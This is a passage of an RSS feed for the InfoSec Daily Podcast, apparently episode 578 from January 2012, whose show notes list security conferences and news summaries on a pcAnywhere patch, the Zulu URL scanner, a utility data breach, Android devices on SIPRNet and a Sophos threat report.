<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.theregister.co.uk/2012/01/25/pcanywhere_patch/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/01/25/pcanywhere_patch/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Symantec is urging users to patch pcAnywhere, its remote control application, following the discovery of a brace of serious security flaws.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The most severe of the two holes allows hackers to remotely inject code into vulnerable systems &#8211; made possible because a service on TCP port 5631 permits a fixed-length buffer overflow during the authentication process. This line of attack ought to be blocked by a properly configured firewall, but it&#39;d be stupid to rely on that without patching vulnerable systems.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The other flaw relies on overwriting files installed by pcAnywhere in order to escalate a user&#39;s privileges, although miscreants will already need access to vulnerable system to do this.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Neither flaw has been weaponised into exploits by hackers, reckons Symantec. The security firm credits Edward Torkington (of NGS Secure) and independent security researcher Tad Seltzer with discovering the flaws.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://research.zscaler.com/2012/01/introducing-project-zulu.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://research.zscaler.com/2012/01/introducing-project-zulu.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Our goal in building Zulu, was to provide a simple and straightforward interface accessible to anyone regardless of security knowledge, while still delivering granular results that are of value to those that are more security savvy. I believe we&#39;ve achieved this by providing a UI that requires no additional input beyond the UI to be analyzed, while allowing a few necessary advanced options, (User-Agent and Referer) when encountering malware triggered only when certain input variables are met. Results also display an overall ranking of </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Benign, Suspicious or Malicious</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, but also include details of elements that went into the overall score.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://threatpost.com/en_us/blogs/data-breach-affects-two-million-ny-customers-state-commission-investigate-012412#.Tx8yS3ae0YA.reddit"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://threatpost.com/en_us/blogs/data-breach-affects-two-million-ny-customers-state-commission-investigate-012412#.Tx8yS3ae0YA.reddit</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The New York State Public Service Commission announced yesterday they&#39;ll be looking into a data breach that may have exposed the personal information of almost two million customers to unknown attackers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An employee from a software consulting firm contracted by New York State Electric &amp; Gas (NYSEG) and Rochester Gas and Electric (RG&amp;E) was allowed unauthorized access to the company&rsquo;s databases, prompting the investigation, according to a statement by the the Commission on Monday.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Both companies are owned by Iberdrola USA of Rochester, N.Y. and serve approximately 1.8 million customers collectively.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While NYSEG and RG&amp;E claim there is no proof customers&rsquo; data may have been mishandled, they have begun to send preventive notifications regarding the breach to their customers. The exposed data includes Social Security Numbers, dates of birth and some financial account information, according to a press release (.PDF) issued by the NY Commission on Monday. </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://fcw.com/articles/2012/01/24/android-smart-phones-tablets-classified-sipr-network.aspx"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://fcw.com/articles/2012/01/24/android-smart-phones-tablets-classified-sipr-network.aspx</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New security standards expected to be approved soon would let devices powered by the Android operating system use the Defense Department&#39;s classified networks, according to an Army official.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DOD and National Institute of Standards and Technology are close to approving the standards, according to Michael McCarthy, program manager and director of operations, Army Brigade Modernization Command. The standards will allow service members, DOD personnel and other government users to use the devices on classified networks, including the military&rsquo;s Secret Internet Protocol Router Network (SIPRNet).</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">McCarthy spoke Jan. 24 at the Soldier Technology 2012 conference in Arlington, Va. He said the goal is to have Android smart phones and tablets able to connect to SIPR-level systems by the summer. This development marks a critical step forward for tactical operations and represents the high priority that mobile communications have become, he said.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;There were going to be no information assurance [standards issued] until 2014, but with the groundswell of interest and needs, the agencies responsible for certification are giving this a higher priority,&rdquo; McCarthy said. &ldquo;The key is that it allows users from DOD and other agencies to access databases that in the past they couldn&rsquo;t get to using a smart phone.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.sophos.com/en-us/security-news-trends/reports/security-threat-report/html-01.aspx"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sophos.com/en-us/security-news-trends/reports/security-threat-report/html-01.aspx</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In 2011, a number of highly visible cyberattacks made news headlines around the world, but the underlying problem affects us all. It seems that the cybercriminals are getting bolder in their attacks as the availability of commercial tools makes mass generation of new malicious code campaigns and exploits easier. The net result has been significant growth in volume of malware and infections.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And for 2012, I anticipate growing sophistication in web-borne attacks, even broader use of mobile and smart devices, and rapid adoption of cloud computing bringing new security challenges.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The web will undoubtedly continue to be the most prominent vector of attack. Cybercriminals tend to focus where the weak spots are and use a technique until it becomes far less effective. We saw this with spam email, which is still present but less popular with cybercriminals as people deploy highly effective gateways. The web remains the dominant source of distribution for malware&mdash;in particular malware using social engineering, or targeting the browser and associated applications with exploits. Social media platforms and similar web applications have become hugely popular with the bad guys, a trend that is only set to continue.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-578-malwareanywhere-zulu-nypii-dodroid-threat-of-the-year/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3417/0/infosec-daily-podcast-episode-578.mp3" length="19220735" type="audio/mpeg" />
		<itunes:duration>0:40:02</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 578 for January 26, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool a[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 578 for January 26, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.theregister.co.uk/2012/01/25/pcanywhere_patch/
&#160;
Symantec is urging users to patch pcAnywhere, its remote control application, following the discovery of a brace of serious security flaws.
&#160;
The most severe of the two holes allows hackers to remotely inject code into vulnerable systems &#8211; made possible because a service on TCP port 5631 permits a fixed-length buffer overflow during the authentication process. This line of attack ought to be blocked by a properly configured firewall, but it&#39;d be stupid to rely on that without patching vulnerable systems.
&#160;
The other flaw relies on overwriting files installed by pcAnywhere in order to escalate a use[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 577 &#8211; Pentest Lessons, Kelihos, O2mo, Privacy Backlash, Hiding Bad Reviews &amp; DNS Changer Change Back</title>
		<link>http://www.isdpodcast.com/episode-577-pentest-lessons-kelihos-o2mo-privacy-backlash-hiding-bad-reviews-dns-changer-change-back</link>
		<comments>http://www.isdpodcast.com/episode-577-pentest-lessons-kelihos-o2mo-privacy-backlash-hiding-bad-reviews-dns-changer-change-back#comments</comments>
		<pubDate>Thu, 26 Jan 2012 02:03:57 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3415</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 577 for January 25, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.637490207515345" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 577 for January 25, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
